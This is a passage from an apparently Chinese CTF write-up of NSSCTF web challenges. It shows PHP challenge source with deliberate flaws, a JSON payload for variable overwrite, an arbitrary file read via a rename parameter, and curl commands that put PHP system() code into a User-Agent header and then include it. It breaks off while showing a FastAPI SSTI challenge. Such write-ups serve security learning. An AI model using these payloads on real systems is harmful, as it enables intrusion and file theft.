<span class="variable">$key</span> =&gt; <span class="variable">$value</span>) &#123;</span><br><span class="line">            <span class="variable">$$key</span> = <span class="variable">$value</span>;</span><br><span class="line">        &#125;</span><br><span class="line">    &#125; <span class="keyword">else</span> &#123;</span><br><span class="line">        <span class="keyword">echo</span> <span class="title function_ invoke__">json_encode</span>([<span class="string">&quot;error&quot;</span> =&gt; <span class="string">&quot;Invalid JSON&quot;</span>]);</span><br><span class="line">        <span class="keyword">exit</span>;</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line"><span class="comment">// 如果是普通表单请求</span></span><br><span class="line"><span class="keyword">elseif</span> (<span class="variable">$_SERVER</span>[<span class="string">&quot;REQUEST_METHOD&quot;</span>] === <span class="string">&quot;POST&quot;</span>) &#123;</span><br><span class="line">    <span class="variable">$username</span> = <span class="variable">$_POST</span>[<span class="string">&#x27;username&#x27;</span>] ;</span><br><span class="line">    <span class="variable">$password</span> = <span class="variable">$_POST</span>[<span class="string">&#x27;password&#x27;</span>] ;</span><br><span class="line"><span class="comment">//    $params = [&#x27;username&#x27; =&gt; $username, &#x27;password&#x27; =&gt; $password];</span></span><br><span class="line">&#125; <span class="keyword">else</span> &#123;</span><br><span class="line">    <span class="keyword">echo</span> <span class="title function_ invoke__">json_encode</span>([<span class="string">&quot;error&quot;</span> =&gt; <span class="string">&quot;Unsupported request method&quot;</span>]);</span><br><span class="line">    <span class="keyword">exit</span>;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="variable">$client_ip</span> = <span class="variable">$_SERVER</span>[<span class="string">&#x27;REMOTE_ADDR&#x27;</span>] ;</span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span> (<span class="variable">$username</span> === <span class="string">&quot;admin&quot;</span> &amp;&amp; <span class="variable">$password</span> === <span class="string">&quot;456789&quot;</span> &amp;&amp; <span class="variable">$client_ip</span> === <span class="string">&quot;127.0.0.1&quot;</span>) &#123;</span><br><span class="line">    <span class="variable">$_SESSION</span>[<span class="string">&#x27;role&#x27;</span>] = <span class="variable">$admin_role</span>;</span><br><span class="line">    <span class="keyword">echo</span> <span class="title function_ invoke__">json_encode</span>([</span><br><span class="line">        <span class="string">&quot;status&quot;</span> =&gt; <span class="string">&quot;success&quot;</span>,</span><br><span class="line">        <span class="string">&quot;message&quot;</span> =&gt; <span class="string">&quot;Login successful (local admin)&quot;</span>,</span><br><span class="line">        <span class="string">&quot;ip&quot;</span> =&gt; <span class="variable">$client_ip</span></span><br><span class="line">    ]);</span><br><span class="line">    <span class="title function_ invoke__">header</span>(<span class="string">&quot;Location: index.php&quot;</span>);</span><br><span class="line">    <span class="keyword">exit</span>;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span> (<span class="variable">$username</span> === <span class="string">&quot;guest&quot;</span> &amp;&amp; <span class="variable">$password</span> === <span class="string">&quot;123456&quot;</span>) &#123;</span><br><span class="line">    <span class="variable">$_SESSION</span>[<span class="string">&#x27;role&#x27;</span>] = <span class="variable">$role</span>;</span><br><span class="line">    <span class="comment">#echo $role;</span></span><br><span class="line">    <span class="comment">#echo json_encode([&quot;status&quot; =&gt; &quot;success&quot;, &quot;message&quot; =&gt; &quot;Login successful&quot;, &quot;user&quot; =&gt; $username]);</span></span><br><span class="line">    <span class="title function_ invoke__">header</span>(<span class="string">&quot;Location: index.php&quot;</span>);</span><br><span class="line">    <span class="keyword">exit</span>;</span><br><span class="line">&#125; <span class="keyword">else</span> &#123;</span><br><span class="line">    <span class="title function_ invoke__">http_response_code</span>(<span class="number">401</span>);</span><br><span class="line">    <span class="keyword">echo</span> <span class="title function_ invoke__">json_encode</span>([<span class="string">&quot;status&quot;</span> =&gt; <span class="string">&quot;failed&quot;</span>, <span class="string">&quot;message&quot;</span> =&gt; <span class="string">&quot;Invalid username or password&quot;</span>]);</span><br><span class="line">&#125;</span><br><span class="line"><span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>

<p>肯定是想法子登录进去<code>$client_ip = $_SERVER[&#39;REMOTE_ADDR&#39;]</code>这玩意获取用户ip地址，即使知道账号密码也登录不进去！然后普通用户登录给我跳回来了，直接看index.php果然是<code>$_SESSION[&#39;role&#39;]</code></p>
<p>那不就正好用上了第一个if进行变量覆盖了吗，直接一次性覆盖三个变量</p>
<figure class="highlight tex"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&#123;&quot;role&quot;:&quot;admin&quot;,&quot;username&quot;:&quot;guest&quot;,&quot;password&quot;:&quot;123456&quot;&#125;</span><br></pre></td></tr></table></figure>

<p>然后就登录上去了</p>
<p>index.php</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line">    <span class="title function_ invoke__">session_start</span>();</span><br><span class="line">    <span class="title function_ invoke__">error_reporting</span>(<span class="number">0</span>);</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">    <span class="variable">$secret</span> = <span class="title function_ invoke__">rtrim</span>(<span class="title function_ invoke__">file_get_contents</span>(<span class="string">&quot;/secret&quot;</span>), <span class="string">&quot;\r\n&quot;</span>);</span><br><span class="line"></span><br><span class="line">    <span class="keyword">if</span>(<span class="keyword">isset</span>(<span class="variable">$_GET</span>[<span class="string">&#x27;secret&#x27;</span>]))&#123;</span><br><span class="line">        <span class="keyword">if</span>(<span class="variable">$_GET</span>[<span class="string">&#x27;secret&#x27;</span>] !== <span class="variable">$secret</span>) &#123;</span><br><span class="line">        </span><br><span class="line">        <span class="title function_ invoke__">header</span>(<span class="string">&quot;Location: login.html&quot;</span>);</span><br><span class="line">        <span class="keyword">exit</span>;</span><br><span class="line">        &#125;</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="keyword">else</span> <span class="keyword">if</span> (!<span class="keyword">isset</span>(<span class="variable">$_SESSION</span>[<span class="string">&#x27;role&#x27;</span>]) || <span class="variable">$_SESSION</span>[<span class="string">&#x27;role&#x27;</span>] !== <span class="string">&#x27;admin&#x27;</span>) &#123;</span><br><span class="line">        <span class="title function_ invoke__">header</span>(<span class="string">&quot;Location: login.html&quot;</span>);</span><br><span class="line">        <span class="keyword">exit</span>;</span><br><span class="line">&#125;</span><br><span class="line"><span class="meta">?&gt;</span></span><br><span class="line">    <span class="meta">&lt;?php</span></span><br><span class="line">    <span class="keyword">if</span> (<span class="variable">$_SERVER</span>[<span class="string">&quot;REQUEST_METHOD&quot;</span>] == <span class="string">&quot;POST&quot;</span>) &#123;</span><br><span class="line">        <span class="variable">$fileType</span> = <span class="title function_ invoke__">strtolower</span>(<span class="title function_ invoke__">pathinfo</span>(<span class="variable">$_FILES</span>[<span class="string">&#x27;file&#x27;</span>][<span class="string">&#x27;name&#x27;</span>], PATHINFO_EXTENSION));</span><br><span class="line"></span><br><span class="line">        <span class="variable">$data</span> = <span class="title function_ invoke__">file_get_contents</span>(<span class="variable">$_FILES</span>[<span class="string">&#x27;file&#x27;</span>][<span class="string">&quot;tmp_name&quot;</span>]);</span><br><span class="line"></span><br><span class="line">        <span class="variable">$type</span> = <span class="title function_ invoke__">mime_content_type</span>(<span class="variable">$_FILES</span>[<span class="string">&#x27;file&#x27;</span>][<span class="string">&quot;tmp_name&quot;</span>]);</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">        <span class="keyword">if</span> (<span class="variable">$_FILES</span>[<span class="string">&quot;file&quot;</span>][<span class="string">&quot;size&quot;</span>] &gt; <span class="number">1000</span>) &#123;</span><br><span class="line">            <span class="keyword">echo</span> <span class="string">&quot;file too large&quot;</span>;</span><br><span class="line">            <span class="keyword">return</span>;</span><br><span class="line">        &#125;</span><br><span class="line"></span><br><span class="line">        <span class="comment">#文件后缀白名单检测，我就不信你还能上传php文件，嘻嘻嘻</span></span><br><span class="line">        <span class="keyword">if</span>(!<span class="title function_ invoke__">in_array</span>(<span class="variable">$fileType</span>, [<span class="string">&quot;jpg&quot;</span>,<span class="string">&quot;png&quot;</span>,<span class="string">&quot;gif&quot;</span>,<span class="string">&quot;jpeg&quot;</span>]))&#123;</span><br><span class="line">            <span class="keyword">echo</span> <span class="string">&quot;file type not allow&quot;</span>;</span><br><span class="line">            <span class="keyword">return</span>;</span><br><span class="line">        &#125;</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"></span><br><span class="line">        <span class="keyword">if</span> (<span class="title function_ invoke__">move_uploaded_file</span>(<span class="variable">$_FILES</span>[<span class="string">&#x27;file&#x27;</span>][<span class="string">&quot;tmp_name&quot;</span>], <span class="string">&quot;./uploads/&quot;</span> . <span class="title function_ invoke__">md5</span>(<span class="variable">$_FILES</span>[<span class="string">&quot;file&quot;</span>][<span class="string">&quot;name&quot;</span>]).<span class="string">&quot;.jpg&quot;</span>)) &#123;</span><br><span class="line">            <span class="keyword">echo</span> <span class="string">&quot;upload success&quot;</span>;</span><br><span class="line">            <span class="keyword">echo</span> <span class="string">&quot;&lt;br&gt;&quot;</span>;</span><br><span class="line">            <span class="keyword">echo</span> <span class="string">&quot;upload to ./uploads/&quot;</span>.<span class="title function_ invoke__">md5</span>(<span class="variable">$_FILES</span>[<span class="string">&quot;file&quot;</span>][<span class="string">&quot;name&quot;</span>]).<span class="string">&quot;.jpg&quot;</span>;</span><br><span class="line">        &#125; <span class="keyword">else</span> &#123;</span><br><span class="line">            <span class="keyword">echo</span> <span class="string">&quot;upload failed&quot;</span>;</span><br><span class="line">        &#125;</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="meta">?&gt;</span></span><br><span class="line"></span><br><span class="line"><span class="meta">&lt;?php</span> </span><br><span class="line">    <span class="variable">$black_list</span>=[<span class="string">&quot;php&quot;</span>, <span class="string">&quot;phtml&quot;</span>, <span class="string">&quot;php3&quot;</span>, <span class="string">&quot;php4&quot;</span>, <span class="string">&quot;php5&quot;</span>, <span class="string">&quot;pht&quot;</span>];</span><br><span class="line">    <span class="keyword">if</span>(<span class="keyword">isset</span>(<span class="variable">$_GET</span>[<span class="string">&#x27;old_name&#x27;</span>]) &amp;&amp; <span class="keyword">isset</span>(<span class="variable">$_GET</span>[<span class="string">&#x27;new_name&#x27;</span>]))&#123;</span><br><span class="line">        <span class="variable">$name</span> = <span class="title function_ invoke__">strtolower</span>(<span class="title function_ invoke__">pathinfo</span>(<span class="variable">$_GET</span>[<span class="string">&#x27;new_name&#x27;</span>], PATHINFO_EXTENSION));</span><br><span class="line">        <span class="keyword">if</span>(<span class="title function_ invoke__">in_array</span>(<span class="variable">$name</span>,<span class="variable">$black_list</span>))&#123;</span><br><span class="line">            <span class="keyword">echo</span> <span class="string">&quot;我不想看到php文件&quot;</span>;</span><br><span class="line">            <span class="keyword">return</span>;</span><br><span class="line">        &#125;</span><br><span class="line"></span><br><span class="line">        <span class="variable">$data</span> = <span class="title function_ invoke__">file_get_contents</span>(<span class="variable">$_GET</span>[<span class="string">&#x27;old_name&#x27;</span>]);</span><br><span class="line">        <span class="keyword">if</span>(<span class="keyword">empty</span>(<span class="variable">$data</span>))&#123;</span><br><span class="line">            <span class="keyword">echo</span> <span class="string">&quot;怎么没有东西，这我改什么&quot;</span>;</span><br><span class="line">            <span class="keyword">return</span>;</span><br><span class="line">        &#125;</span><br><span class="line">        <span class="variable">$file</span> = <span class="title function_ invoke__">tmpfile</span>();</span><br><span class="line">        <span class="title function_ invoke__">fwrite</span>(<span class="variable">$file</span>, <span class="variable">$data</span>);</span><br><span class="line">        <span class="title function_ invoke__">fflush</span>(<span class="variable">$file</span>);</span><br><span class="line">        <span class="title function_ invoke__">fclose</span>(<span class="variable">$file</span>);</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">        <span class="title function_ invoke__">file_put_contents</span>(<span class="string">&quot;./uploads/&quot;</span>.<span class="variable">$_GET</span>[<span class="string">&#x27;new_name&#x27;</span>],<span class="variable">$data</span>);</span><br><span class="line">        <span class="keyword">echo</span> <span class="string">&quot;文件重命名成功&quot;</span>;</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="meta">?&gt;</span></span><br><span class="line"></span><br><span class="line">    &lt;div <span class="class"><span class="keyword">class</span>=&quot;<span class="title">files</span>&quot;&gt;</span></span><br><span class="line"><span class="class">        &lt;?<span class="title">php</span></span></span><br><span class="line"><span class="class">        $<span class="title">files</span> = <span class="title">scandir</span>(&quot;./<span class="title">uploads</span>/&quot;);</span></span><br><span class="line"><span class="class">        <span class="title">foreach</span> ($<span class="title">files</span> <span class="title">as</span> $<span class="title">file</span>) </span>&#123;</span><br><span class="line">            <span class="keyword">if</span>(<span class="variable">$file</span> != <span class="string">&quot;.&quot;</span> &amp;&amp; <span class="variable">$file</span> != <span class="string">&quot;..&quot;</span>) &#123;</span><br><span class="line">                <span class="keyword">if</span> (<span class="title function_ invoke__">is_file</span>(<span class="string">&#x27;./uploads/&#x27;</span> . <span class="variable">$file</span>)) &#123;</span><br><span class="line">                    <span class="meta">?&gt;</span></span><br><span class="line">                    &lt;a href=<span class="string">&quot;./uploads/&lt;?=<span class="subst">$file</span>?&gt;&quot;</span>&gt;<span class="meta">&lt;?=</span><span class="variable">$file</span><span class="meta">?&gt;</span>&lt;/a&gt;</span><br><span class="line">                <span class="meta">&lt;?php</span> &#125;&#125;&#125; <span class="meta">?&gt;</span></span><br><span class="line">    &lt;/div&gt;</span><br></pre></td></tr></table></figure>

<p>我把无关紧要的html部分给删了！</p>
<p>先看第一个php块，就是一个只能上传图片的白名单检测</p>
<p>第二个php块关键部分</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"><span class="variable">$data</span> = <span class="title function_ invoke__">file_get_contents</span>(<span class="variable">$_GET</span>[<span class="string">&#x27;old_name&#x27;</span>]);</span><br><span class="line"><span class="title function_ invoke__">file_put_contents</span>(<span class="string">&quot;./uploads/&quot;</span>.<span class="variable">$_GET</span>[<span class="string">&#x27;new_name&#x27;</span>],<span class="variable">$data</span>);</span><br></pre></td></tr></table></figure>

<p>它会将读到的文件写入新的文件名，那不就直接任意文件读取了嘛xd</p>
<figure class="highlight tex"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">?old<span class="built_in">_</span>name=/flag<span class="built_in">&amp;</span>new<span class="built_in">_</span>name=rufeii</span><br><span class="line">NSSCTF&#123;77e17714-ce59-431d-b605-0db30f8bbb50&#125;</span><br></pre></td></tr></table></figure>

<h2 id="ez-include-revenge"><a href="#ez-include-revenge" class="headerlink" title="ez_include_revenge"></a>ez_include_revenge</h2><p>前面那道题的加强版</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br></pre></td><td class="code"><pre><span class="line"> <span class="meta">&lt;?php</span></span><br><span class="line"><span class="title function_ invoke__">stream_wrapper_unregister</span>(<span class="string">&#x27;php&#x27;</span>);   <span class="comment">//禁用php流封装协议</span></span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span>(!<span class="keyword">isset</span>(<span class="variable">$_GET</span>[<span class="string">&#x27;no_hl&#x27;</span>])) <span class="title function_ invoke__">highlight_file</span>(<span class="keyword">__FILE__</span>);</span><br><span class="line"></span><br><span class="line"><span class="variable">$mkdir</span> = <span class="function"><span class="keyword">function</span>(<span class="params"><span class="variable">$dir</span></span>) </span>&#123;</span><br><span class="line">    <span class="title function_ invoke__">system</span>(<span class="string">&#x27;mkdir -- &#x27;</span>.<span class="title function_ invoke__">escapeshellarg</span>(<span class="variable">$dir</span>));</span><br><span class="line">&#125;;                                   <span class="comment">//创建目录用的函数，后面接了个对&#x27;进行转义的函数</span></span><br><span class="line"><span class="variable">$randFolder</span> = <span class="title function_ invoke__">bin2hex</span>(<span class="title function_ invoke__">random_bytes</span>(<span class="number">16</span>));</span><br><span class="line"><span class="variable">$mkdir</span>(<span class="string">&#x27;users/&#x27;</span>.<span class="variable">$randFolder</span>);</span><br><span class="line"><span class="title function_ invoke__">chdir</span>(<span class="string">&#x27;users/&#x27;</span>.<span class="variable">$randFolder</span>);        <span class="comment">//创建users/rand/目录并切到这个目录，也就是说此时网站根目录指向这个</span></span><br><span class="line"></span><br><span class="line"><span class="variable">$userFolder</span> = (<span class="keyword">isset</span>(<span class="variable">$_SERVER</span>[<span class="string">&#x27;HTTP_X_FORWARDED_FOR&#x27;</span>]) ? <span class="variable">$_SERVER</span>[<span class="string">&#x27;HTTP_X_FORWARDED_FOR&#x27;</span>] : <span class="variable">$_SERVER</span>[<span class="string">&#x27;REMOTE_ADDR&#x27;</span>]);</span><br><span class="line"><span class="variable">$userFolder</span> = <span class="title function_ invoke__">basename</span>(<span class="title function_ invoke__">str_replace</span>([<span class="string">&#x27;.&#x27;</span>,<span class="string">&#x27;-&#x27;</span>],[<span class="string">&#x27;&#x27;</span>,<span class="string">&#x27;&#x27;</span>],<span class="variable">$userFolder</span>));</span><br><span class="line"><span class="comment">//xff可以控制创建的目录，但是有替换，basename返回文件名部分，好像这里没什么用</span></span><br><span class="line"></span><br><span class="line"><span class="variable">$mkdir</span>(<span class="variable">$userFolder</span>);</span><br><span class="line"><span class="title function_ invoke__">chdir</span>(<span class="variable">$userFolder</span>);</span><br><span class="line"><span class="title function_ invoke__">file_put_contents</span>(<span class="string">&#x27;profile&#x27;</span>,<span class="title function_ invoke__">print_r</span>(<span class="variable">$_SERVER</span>,<span class="literal">true</span>));   <span class="comment">//创建目录，并且在我们创建的目录下写入环境变量</span></span><br><span class="line"><span class="title function_ invoke__">chdir</span>(<span class="string">&#x27;..&#x27;</span>);       <span class="comment">//回到users/rand/</span></span><br><span class="line"><span class="variable">$_GET</span>[<span class="string">&#x27;page&#x27;</span>]=<span class="title function_ invoke__">str_replace</span>(<span class="string">&#x27;.&#x27;</span>,<span class="string">&#x27;&#x27;</span>,<span class="variable">$_GET</span>[<span class="string">&#x27;page&#x27;</span>]);      <span class="comment">//过滤点</span></span><br><span class="line"><span class="keyword">if</span>(!<span class="title function_ invoke__">stripos</span>(<span class="title function_ invoke__">file_get_contents</span>(<span class="variable">$_GET</span>[<span class="string">&#x27;page&#x27;</span>]),<span class="string">&#x27;&lt;?&#x27;</span>) &amp;&amp; !<span class="title function_ invoke__">stripos</span>(<span class="title function_ invoke__">file_get_contents</span>(<span class="variable">$_GET</span>[<span class="string">&#x27;page&#x27;</span>]),<span class="string">&#x27;php&#x27;</span>)) &#123;</span><br><span class="line">    <span class="keyword">if</span> (<span class="title function_ invoke__">preg_match</span>(<span class="string">&#x27;/f.*l.*a.*g/i&#x27;</span>, <span class="variable">$_GET</span>[<span class="string">&#x27;page&#x27;</span>])) &#123;</span><br><span class="line">        <span class="keyword">echo</span> <span class="string">&quot;这次不会让你得逞了！&quot;</span>;       <span class="comment">//flag被严格过滤，上个版本的不能打了</span></span><br><span class="line">    &#125;<span class="keyword">else</span>&#123;</span><br><span class="line">        <span class="keyword">include</span>(<span class="variable">$_GET</span>[<span class="string">&#x27;page&#x27;</span>]);</span><br><span class="line">    &#125;</span><br><span class="line">&#125;<span class="keyword">else</span>&#123;</span><br><span class="line">    <span class="keyword">echo</span> <span class="string">&quot;再想想?&quot;</span>;</span><br><span class="line">&#125;</span><br><span class="line"><span class="title function_ invoke__">chdir</span>(<span class="keyword">__DIR__</span>);</span><br><span class="line"><span class="title function_ invoke__">system</span>(<span class="string">&#x27;rm -rf users/&#x27;</span>.<span class="variable">$randFolder</span>);     <span class="comment">//删除创建的目录</span></span><br><span class="line"><span class="meta">?&gt;</span> </span><br></pre></td></tr></table></figure>

<p>那么分析完源码，不能用点和php伪协议，试了一下data伪协议，<code>allow_url_include=0</code>直接限制死了远程包含都不行了，session包含暂且不说能不能过waf，我估计<strong>session.upload_progress.enabled</strong>这个没开，也打不了！下面打不通了，就只能考虑配合上面一起打了</p>
<h3 id="非预期"><a href="#非预期" class="headerlink" title="非预期"></a>非预期</h3><p><code>file_put_contents(&#39;profile&#39;,print_r($_SERVER,true));</code>能不能利用这个文件呢？</p>
<figure class="highlight tex"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">curl -i -H &quot;User-Agent: &lt;?php system(&#x27;tac /f*&#x27;);?&gt;&quot; -H &quot;X-Forwarded-For: rufeii&quot; &quot;http://node10.anna.nssctf.cn:20167/?page=rufeii/profile&quot;</span><br><span class="line">这个不行肯定会被检测到</span><br><span class="line">curl -i -H &quot;User-Agent: &lt;?php system(&#x27;tac /f*&#x27;);?&gt;&quot; -H &quot;X-Forwarded-For: .&quot; &quot;http://node10.anna.nssctf.cn:20167/?page=profile&quot;但是这个就打出来了非预期说是</span><br></pre></td></tr></table></figure>

<p>莫名其妙，所以说还是要多去尝试，看似不可能实则也有可能！</p>
<p>为什么会出现非预期？</p>
<p><img src="/images/achieve/2025/11/4.png"></p>
<p>file_gets_contents只会在工作目录找！</p>
<p><img src="/images/achieve/2025/11/5.png"></p>
<p>mkdir无法递归创建目录除非使用-p参数。那么前面的</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"><span class="variable">$randFolder</span> = <span class="title function_ invoke__">bin2hex</span>(<span class="title function_ invoke__">random_bytes</span>(<span class="number">16</span>));</span><br><span class="line"><span class="variable">$mkdir</span>(<span class="string">&#x27;users/&#x27;</span>.<span class="variable">$randFolder</span>);</span><br><span class="line"><span class="title function_ invoke__">chdir</span>(<span class="string">&#x27;users/&#x27;</span>.<span class="variable">$randFolder</span>); </span><br></pre></td></tr></table></figure>

<p>就是没用的，这点其实在报错中也可以体现！然后如果xff为空profile就写在html目录下，chdir(‘..’)到www，所以此时工作目录是www！脚本目录是html！file_gets_contents在工作目录肯定找不到profile，但是include会去脚本目录找，所以直接绕过。</p>
<p>也就是说我们把profile写到了脚本目录去（&#x2F;var&#x2F;www&#x2F;html&#x2F;profile），然后工作目录不是脚本目录的时候就可以绕过！利用的是这两个函数处理的差异性！</p>
<h3 id="预期"><a href="#预期" class="headerlink" title="预期"></a>预期</h3><p>前面说到是因为少了-p参数不能递归创造目录，导致profile写到了脚本目录，如果有的话，肯定上面的打法就失效了！那么就是预期的打法！</p>
<p>预期打法就是利用这两个玩意对伪协议检测差异！</p>
<blockquote>
<p>file_get_contens对data协议的检测data:[<mediatype>][;base64],<data><br>include [协议头]:&#x2F;&#x2F;这个才能检测成伪协议</p>
</blockquote>
<p>也就是说我们把文件名命名为这种形式是不是就可以让<code>file_get_contents</code>认为是伪协议，但是include会去包含！所以甚牛而逼之！</p>
<p>payload：</p>
<figure class="highlight tex"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">curl -H &quot;X-Forwarded-For: data:,rufeii&quot; -H &quot;User-Agent: &lt;?php system(&#x27;tac /f*&#x27;);?&gt;&quot; &quot;http://node9.anna.nssctf.cn:25670/?page=data:,rufeii/profile&quot;</span><br></pre></td></tr></table></figure>

<h2 id="ez-fastapi"><a href="#ez-fastapi" class="headerlink" title="ez_fastapi"></a>ez_fastapi</h2><h3 id="非预期-1"><a href="#非预期-1" class="headerlink" title="非预期"></a>非预期</h3><p>这题的非预期是出网反弹shell</p>
<p>app.py</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> fastapi <span class="keyword">import</span> FastAPI, Request</span><br><span class="line"><span class="keyword">from</span> fastapi.responses <span class="keyword">import</span> HTMLResponse, JSONResponse</span><br><span class="line"><span class="keyword">from</span> jinja2 <span class="keyword">import</span> Environment</span><br><span class="line"><span class="keyword">import</span> uvicorn</span><br><span class="line"></span><br><span class="line">app = FastAPI()</span><br><span class="line">Jinja2 = Environment()</span><br><span class="line"></span><br><span class="line">Jinja2 = Environment(</span><br><span class="line">    variable_start_string=<span class="string">&#x27;&#123;&#x27;</span>,</span><br><span class="line">    variable_end_string=<span class="string">&#x27;&#125;&#x27;</span></span><br><span class="line">)</span><br><span class="line"></span><br><span class="line"><span class="meta">@app.exception_handler(<span class="params"><span class="number">404</span></span>)</span></span><br><span class="line"><span class="keyword">async</span> <span class="keyword">def</span> <span class="title function_">handler_404</span>(<span class="params">request, exc</span>):</span><br><span class="line">    <span class="built_in">print</span>(<span class="string">&#x27;not found!&#x27;</span>)</span><br><span class="line">    <span class="keyword">return</span> JSONResponse(</span><br><span class="line">        status_code=<span class="number">404</span>,</span><br><span class="line">        content=&#123;<span class="string">&quot;message&quot;</span>: <span class="string">&quot;Not found&quot;</span>&#125;</span><br><span class="line">    )</span><br><span class="line"></span><br><span class="line"><span class="meta">@app.middleware(<span class="params"><span class="string">&#x27;http&#x27;</span></span>)</span></span><br><span class="line"><span class="keyword">async</span> <span class="keyword">def</span> <span class="title function_">say_hello</span>(<span class="params">request: Request, call_next</span>):</span><br><span class="line">    response = <span class="keyword">await</span> call_next(request)</span><br><span class="line">    response.headers[<span class="string">&#x27;say1&#x27;</span>] = <span class="string">&#x27;hello!&#x27;</span></span><br><span class="line">    <span class="keyword">return</span> response</span><br><span class="line"></span><br><span class="line"><span class="meta">@app.middleware(<span class="params"><span class="string">&#x27;http&#x27;</span></span>)</span></span><br><span class="line"><span class="keyword">async</span> <span class="keyword">def</span> <span class="title function_">say_hi</span>(<span class="params">request: Request, call_next</span>):</span><br><span class="line">    response = <span class="keyword">await</span> call_next(request)</span><br><span class="line">    response.headers[<span class="string">&#x27;say2&#x27;</span>] = <span class="string">&#x27;hi!&#x27;</span></span><br><span class="line">    <span class="keyword">return</span> response</span><br><span class="line"></span><br><span class="line"><span class="meta">@app.get(<span class="params"><span class="string">&quot;/&quot;</span></span>)</span></span><br><span class="line"><span class="keyword">async</span> <span class="keyword">def</span> <span class="title function_">index</span>():</span><br><span class="line">    <span class="keyword">return</span> &#123;<span class="string">&quot;message&quot;</span>: <span class="string">&quot;Hello World&quot;</span>&#125;</span><br><span class="line"></span><br><span class="line"><span 